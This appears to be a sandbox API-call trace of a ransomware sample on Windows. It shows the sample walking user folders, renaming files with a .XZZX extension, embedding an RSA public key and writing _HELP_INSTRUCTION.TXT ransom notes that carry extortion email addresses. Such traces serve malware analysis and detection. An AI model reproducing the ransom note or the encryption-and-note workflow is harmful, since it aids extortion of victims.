lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.936] lstrcpyW (in: lpString1=0x179d3c, lpString2="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" | out: lpString1="FA78694804C1E3566FC4CB7C08F6C79E.XZZX") returned="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" [0189.936] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.936] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc7c [0189.936] Sleep (dwMilliseconds=0x96) [0190.091] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0190.091] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0190.091] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0190.091] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0190.092] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0190.092] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0190.092] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0190.092] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" [0190.092] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*" [0190.092] SetErrorMode (uMode=0x1) returned 0x1 [0190.092] wsprintfW (in: param_1=0x1792fc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\_HELP_INSTRUCTION.TXT") returned 96 [0190.092] GetUserNameW (in: lpBuffer=0x1770d8, pcbBuffer=0x176ec4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x176ec4) returned 1 [0190.092] wsprintfW (in: param_1=0x176ed0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0190.092] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x176ecc | out: phkResult=0x176ecc*=0xc80) returned 0x0 [0190.092] RegQueryValueExW (in: hKey=0xc80, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43af118, lpcbData=0x176ec8*=0x104 | out: lpType=0x0, lpData=0x43af118*=0x65, lpcbData=0x176ec8*=0x4a) returned 0x0 [0190.093] RegCloseKey (hKey=0xc80) returned 0x0 [0190.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x1782fc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0190.093] wsprintfW (in: param_1=0x1772fc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0190.093] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc80 [0190.093] CloseHandle (hObject=0xc80) returned 1 [0190.093] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3cde9d8 [0190.093] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="DqOPM" [0190.093] lstrcpyW (in: lpString1=0x179504, lpString2="DqOPM" | out: lpString1="DqOPM") returned="DqOPM" [0190.093] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0190.093] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0190.093] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0190.093] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0190.093] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0190.093] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0190.093] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0190.093] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0190.093] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0190.093] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0190.093] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0190.093] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0190.093] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0190.093] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0190.094] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0190.094] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0190.094] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0190.094] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0190.094] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0190.094] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0190.094] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.094] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0190.094] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0190.094] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0190.094] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0190.094] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0190.095] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0190.095] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0190.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0190.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="My Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0190.095] SetErrorMode (uMode=0x1) returned 0x1 [0190.095] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0190.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" [0190.095] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" [0190.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*" [0190.095] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0190.095] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0190.095] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0190.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*" [0190.095] SetErrorMode (uMode=0x1) returned 0x1 [0190.095] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\_HELP_INSTRUCTION.TXT") returned 64 [0190.095] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0190.095] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0190.095] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xc84) returned 0x0 [0190.096] RegQueryValueExW (in: hKey=0xc84, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43af348, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43af348*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0190.096] RegCloseKey (hKey=0xc84) returned 0x0 [0190.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0190.096] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0190.096] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc84 [0190.096] CloseHandle (hObject=0xc84) returned 1 [0190.096] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0190.096] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0190.096] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0190.096] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0190.096] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0190.096] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0190.096] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0190.096] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NetHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0190.096] SetErrorMode (uMode=0x1) returned 0x1 [0190.096] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0190.096] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" [0190.096] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" [0190.096] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*" [0190.096] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0190.097] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0190.097] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0190.097] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*" [0190.097] SetErrorMode (uMode=0x1) returned 0x1 [0190.097] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\_HELP_INSTRUCTION.TXT") returned 59 [0190.097] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0190.097] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0190.097] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xc84) returned 0x0 [0190.097] RegQueryValueExW (in: hKey=0xc84, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43af578, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43af578*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0190.097] RegCloseKey (hKey=0xc84) returned 0x0 [0190.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0190.097] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0190.097] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc84 [0190.097] CloseHandle (hObject=0xc84) returned 1 [0190.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0190.098] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0190.098] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0190.098] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0190.098] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0190.098] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0190.098] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0190.098] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0190.098] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0190.098] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0190.098] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0190.098] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0190.098] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0190.098] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0190.098] SetErrorMode (uMode=0x1) returned 0x1 [0190.098] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0190.098] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.098] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.098] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0190.098] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0190.098] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="Pictures" [0190.098] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0190.098] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.098] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.098] lstrcmpW (lpString1="1698FA38038EB2CD51213BC807C39715.XZZX", lpString2="..") returned 1 [0190.098] lstrcmpW 